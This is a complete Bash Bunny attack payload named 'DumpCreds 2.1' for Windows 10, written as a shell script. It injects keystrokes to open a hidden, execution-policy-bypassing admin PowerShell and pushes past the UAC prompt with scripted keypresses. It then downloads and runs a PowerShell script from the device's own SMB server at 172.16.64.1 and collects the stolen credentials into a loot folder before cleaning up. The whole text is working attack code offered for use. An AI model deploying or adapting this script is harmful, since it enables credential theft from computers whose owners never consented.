#!/bin/bash # # Title: DumpCreds 2.1 # Author: QDBA # Version: 2.1.0 # Build: 1004 # Target: Windows 10 # Attack Modes: HID, RNDIS_ETHERNET # Description: # Works only with Bash Bunny FW 1.1 and up. # # LEDS: # Magenta: Setup # Red: No /tools/impacket/examples/smbserver.py found # Red Blinking: Target did not acquire IP address # Yellow Blink: Initialization # Yellow Double Blink: HID Stage # Yellow Triple Blink: Wait for IP coming up # Cyan Blink: Wait for Handshake (SMBServer Coming up) # Cyan Quintuple Blink: Powershell scripts running # White Rapid Blink: Cleanup, copy Files to /loot # Green: Finished logger -t DumpCred_2.1 "########################### Start payload DumpCred_2.1 #############################" ###### Lets Start #### LED SETUP GET SWITCH_POSITION # Some Variables SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION LOOTDIR=$SWITCHDIR/loot # if the file DEBUG in payload folder exist, enter debug mode if [ -f $SWITCHDIR/DEBUG ];then DEBUG=1 # 1= Debug on / 0= Debug off tail -f /var/log/syslog > /tmp/log.txt & else DEBUG=0 fi mkdir -p $LOOTDIR REQUIRETOOL impacket # remove old Handshake Files rm -f $SWITCHDIR/CON_* # HID STAGE # Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1. logger -t DumpCred_2.1 "### Enter HID Stage ###" LED STAGE1 ATTACKMODE HID Q DELAY 5000 # Launch initial cmd if [ $DEBUG -eq 1 ]; then RUN WIN cmd else RUN WIN cmd /k mode con lines=1 cols=100 fi # Launch powershell as admin (red window) Q DELAY 1000 if [ $DEBUG -eq 1 ]; then Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f'-Verb runAs" else Q STRING start powershell -NoP -NonI -W Hidden -Exec Bypass -c "Start-Process cmd -A '/t:4f /k mode con lines=1 cols=100' -Verb runAs" fi Q DELAY 500 Q ENTER # Bypass UAC :: Change "ALT j" and "ALT n" according to your language i.e. for us it is ALT o (OK) and ALT c (cancel) # With Admin rights the UAC prompt opens. ALT j goes to the prompt and the admin CMD windows opens. The ALT n goes to this Window (doesn't matter) than Enter for Newline # now the second powershell command goes to the admin cmd windows. # With no Adminrights the the credentils prompt opens. ALT j doesn't do anything because there are no credentials. Then ALT n cancels the credentials propmpt. # the second powershell command goes to the cmd Windows I open first. Q DELAY 1000 Q ALT j Q DELAY 500 Q ENTER Q DELAY 1000 Q ALT n Q DELAY 500 Q ENTER LED STAGE2 # Wait for Bunny Ethernet and Start main.ps1 Powershell Script Q DELAY 500 if [ $DEBUG -eq 1 ]; then Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1 9> 1> %TEMP%\pslog.tmp } }\"" else Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\"" fi Q DELAY 1000 Q ENTER logger -t DumpCred_2.1 "### Enter Ethernet Stage ###" # Ethernet Tage LED STAGE3 ATTACKMODE RNDIS_ETHERNET logger -t DumpCred_2.1 "### Start SMBServer ###" # Start SMB Server /tools/impacket/examples/smbserver.py e $SWITCHDIR & # Give target a chance to start exfiltration sleep 2 GET TARGET_IP # Check target IP address. If unset, blink slow red. if [ -z "${TARGET_IP}" ]; then LED FAIL2 logger -t DumpCred_2.1 "### No Target_IP ###" logger -t DumpCred_2.1 "### Failed ###" exit fi logger -t DumpCred_2.1 "### TARGET_IP: " $TARGET_IP " ###" LED STAGE4 # Handshake Bunny and Computer while ! [ -f $SWITCHDIR/CON_REQ ]; do logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_REQ ###" sleep 1 done mv $SWITCHDIR/CON_REQ $SWITCHDIR/CON_OK LED Y VERYFAST # Wait until CON_EOF - Computer set it if all is ready while ! [ -f $SWITCHDIR/CON_EOF ]; do logger -t DumpCred_2.1 "### Loop Handshake: waiting to CON_EOF ###" sleep 2 done LED CLEANUP # Cleanup logger -t DumpCred_2.1 "### cleanup and copy files ###" if ! [ -d /root/udisk/loot/DumpCred_2.1 ]; then mkdir -p /root/udisk/loot/DumpCred_2.1 fi mv -f $LOOTDIR/* /root/udisk/loot/DumpCred_2.1 rmdir $LOOTDIR rm -f $SWITCHDIR/CON_EOF logger -t DumpCred_2.1 "######################## End payload DumpCred_2.1 ##########################" # realy the end.... if [ $DEBUG -eq 1 ]; then killall tail cp /tmp/log.txt /root/udisk/loot/DumpCred_2.1/ fi ATTACKMODE RNDIS_ETHERNET STORAGE sync; sleep 1; sync LED FINISH